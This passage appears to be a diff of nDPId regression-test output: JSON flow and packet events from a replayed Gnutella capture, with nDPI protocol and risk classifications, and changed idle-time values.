+00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":894,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":90777,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":601,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90777,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":50312,"dst_port":23548,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":901,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":2,"flow_last_seen":90784,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90784,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA14AAEAG805VqCJpCgACD5vkxIAAsMIB8fB5WWAS\/\/+FlQAAAgQFtA=="} 
+00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":902,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":2,"flow_last_seen":90784,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90784,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA18AAEAG3PlXezbqCgACD9NyxH0AsbwBqI15YWAS\/\/+HEAAAAgQFtA=="} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":903,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":3,"flow_last_seen":90785,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90785,"pkt":"UlQAEjUCCAAn5uVZCABFAAAo3DZAAIAGmnkKAAIPVagiacSAm+Tx8HlZALDCAlAQ+vCiYQAA"} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":904,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":2,"flow_last_seen":90785,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90785,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA2AAAEAGnkMzRJnWCgACD2aNxJMAsrYBwo+\/QmAS\/\/9bRgAAAgQFtA=="} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":905,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":277,"flow_packet_id":3,"flow_last_seen":90785,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90785,"pkt":"UlQAEjUCCAAn5uVZCABFAAAooEJAAIAGwBkKAAIPV3s26sR903KojXlhALG8AlAQ+vCj3AAA"} 
+00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":906,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90744,"flow_last_seen":90785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90785,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.168.34.105","src_port":50304,"dst_port":39908,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":908,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_packet_id":3,"flow_last_seen":90785,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90785,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoeOBAAIAGqMYKAAIPM0SZ1sSTZo3Cj79CALK2AlAQ+vB4EgAA"} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":909,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90747,"flow_last_seen":90785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90785,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":50323,"dst_port":26253,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":911,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90743,"flow_last_seen":90785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90785,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.123.54.234","src_port":50301,"dst_port":54130,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":918,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":2,"flow_last_seen":90787,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90787,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA2cAAEAGHo9QB\/zACgACDxroxIoAs7ABAD7ueWAS\/\/\/AYAAAAgQFtA=="} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":919,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_packet_id":3,"flow_last_seen":90787,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90787,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoIw9AAIAGfuoKAAIPUAf8wMSKGugAPu55ALOwAlAQ+vDdLAAA"} 
+01151{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":920,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90746,"flow_last_seen":90787,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":264,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":90787,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":50314,"dst_port":6888,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"6992dc627532d4fbccd43fb03d3bdeb4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":930,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":2,"flow_last_seen":90795,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90795,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA24AAEAGymQugHJrCgACDxmyxHoAtKoBziHWF2AS\/\/++AAAAAgQFtA=="} 
+00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":932,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":3,"flow_last_seen":90796,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90796,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoDztAAIAGPpsKAAIPLoBya8R6GbLOIdYXALSqAlAQ+vDazAAA"} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":938,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":2,"flow_last_seen":90799,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90799,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA3IAAEAGvK6khAoZCgACD9gGxJIAtaQBToGf\/mAS\/\/+tmgAAAgQFtA=="} +00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":939,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":298,"flow_packet_id":3,"flow_last_seen":90799,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90799,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoptFAAIAGmVIKAAIPpIQKGcSS2AZOgZ\/+ALWkAlAQ+vDKZgAA"} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":942,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90741,"flow_last_seen":90799,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90799,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"46.128.114.107","src_port":50298,"dst_port":6578,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":944,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90747,"flow_last_seen":90800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90800,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":50322,"dst_port":55302,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":946,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":2,"flow_last_seen":90800,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90800,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA3YAAEAGCtCwY7AUCgACDxjKxIMAtp4BeVRy4GAS\/\/\/DVQAAAgQFtA=="} +00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":947,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":283,"flow_packet_id":3,"flow_last_seen":90801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90801,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoGLRAAIAGdZUKAAIPsGOwFMSDGMp5VHLgALaeAlAQ+vDgIQAA"} 
+00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":948,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90745,"flow_last_seen":90801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":90801,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.99.176.20","src_port":50307,"dst_port":6346,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90809,"flow_last_seen":90809,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":90809,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":28681,"dst_port":23548,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":964,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":300,"flow_packet_id":1,"flow_last_seen":90809,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":90809,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4BlIAAIAREmwKAAIPaO6s+nAJW\/wAJA6KHB0xAtgN+vD\/0M\/t\/ONIAwABAAUAAADDglFLQA=="} 
00562{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":986,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":300,"flow_packet_id":2,"flow_last_seen":90840,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":90840,"pkt":"CAAn5uVZUlQAEjUCCABFAACBA44AAEARVOdo7qz6CgACD1v8cAkAbdSrHB0xAtgN+vD\/0M\/t\/ONIAwEBAE4AAAD8W2jurPoAAAAACAAAAMMCVkNFR1RLR2IDR1VFQQICVVBDAgEGAkRVQl9jATZQIAEZ8HQAiAgAAAAAAAEAAQNESFRDAAABglFLRIDlHEU="} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":994,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":2,"flow_last_seen":90843,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90843,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA5MAAEAGzLImjnfqCgACD8JExHcAt5gBIyGRwmAS\/\/8ZNwAAAgQFtA=="} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":997,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":3,"flow_last_seen":90843,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90843,"pkt":"UlQAEjUCCAAn5uVZCABFAAAopBpAAIAGrC4KAAIPJo536sR3wkQjIZHCALeYAlAQ+vA2AwAA"} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":994,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":2,"flow_last_seen":90843,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90843,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA5MAAEAGzLImjnfqCgACD8JExHcAt5gBIyGRwmAS\/\/8ZNwAAAgQFtA=="} 
+00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":997,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":3,"flow_last_seen":90843,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90843,"pkt":"UlQAEjUCCAAn5uVZCABFAAAopBpAAIAGrC4KAAIPJo536sR3wkQjIZHCALeYAlAQ+vA2AwAA"} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":999,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90845,"flow_last_seen":90845,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":90845,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.61.52.183","src_port":28681,"dst_port":11852,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":999,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":301,"flow_packet_id":1,"flow_last_seen":90845,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":90845,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4c0wAAIARymUKAAIPvD00t3AJLkwAJK1JGu4xAkJx0f\/\/24\/JSJ6wAwABAAUAAADDglFLQA=="} 
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1005,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90740,"flow_last_seen":90850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90850,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"38.142.119.234","src_port":50295,"dst_port":49732,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -01580{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1011,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":90746,"flow_last_seen":90857,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1724,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":90857,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":50314,"dst_port":6888,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"","ja3":"6992dc627532d4fbccd43fb03d3bdeb4","ja3s":"1249fb68f48c0444718e4d3b48b27188","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=gtk-gnutella\/1.2.1","subjectDN":"CN=gtk-gnutella\/1.2.1","fingerprint":"E8:DD:F0:B2:FF:8C:27:5A:12:75:D4:AE:60:1B:D9:87:E8:FF:45:93"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1005,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90740,"flow_last_seen":90850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":90850,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"38.142.119.234","src_port":50295,"dst_port":49732,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +01580{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1011,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":90746,"flow_last_seen":90857,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1724,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":90857,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":50314,"dst_port":6888,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": 
{"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"6992dc627532d4fbccd43fb03d3bdeb4","ja3s":"1249fb68f48c0444718e4d3b48b27188","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=gtk-gnutella\/1.2.1","subjectDN":"CN=gtk-gnutella\/1.2.1","fingerprint":"E8:DD:F0:B2:FF:8C:27:5A:12:75:D4:AE:60:1B:D9:87:E8:FF:45:93"}} 00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1016,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":301,"flow_packet_id":2,"flow_last_seen":90857,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":130,"pkt_l4_len":96,"thread_ts_msec":90857,"pkt":"CAAn5uVZUlQAEjUCCABFAAB0A6AAAEAReda8PTS3CgACDy5McAkAYD84Gu4xAkJx0f\/\/24\/JSJ6wAwEBAEEAAABMLrw9NLcAAAAACAAAAMMCVkNFR1RLR1cDR1VFQQICVVBDAgEHAkRVQ4BRAQNUTFNAA0RIVEMAAAGCUUtE7kD0pA=="} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1026,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90864,"flow_last_seen":90864,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":90864,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.187.74.173","src_port":28681,"dst_port":53489,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1026,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":302,"flow_packet_id":1,"flow_last_seen":90864,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":90864,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4OIoAAIAR8bMKAAIPubtKrXAJ0PEAJMQW\/3wxAm1gREr\/fw\/7dxmzAwABAAUAAADDglFLQA=="} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1030,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90871,"flow_last_seen":90871,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":90871,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"142.132.165.13","src_port":28681,"dst_port":30566,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1030,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":303,"flow_packet_id":1,"flow_last_seen":90871,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":90871,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4xlIAAIARNMIKAAIPjoSlDXAJd2YAJJzV5\/IxAvsVo43\/HfOSkBgzAwABAAUAAADDglFLQA=="} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1031,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":2,"flow_last_seen":90872,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":90872,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA6gAAEAGqm3BJf+CCgACD\/CwxIQAuJIBv98bx2AS\/\/+nyQAAAgQFtA=="} 
-00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1032,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":284,"flow_packet_id":3,"flow_last_seen":90872,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":90872,"pkt":"UlQAEjUCCAAn5uVZCABFAAAogopAAIAGq44KAAIPwSX\/gsSE8LC\/3xvHALiSAlAQ+vDElQAA"} 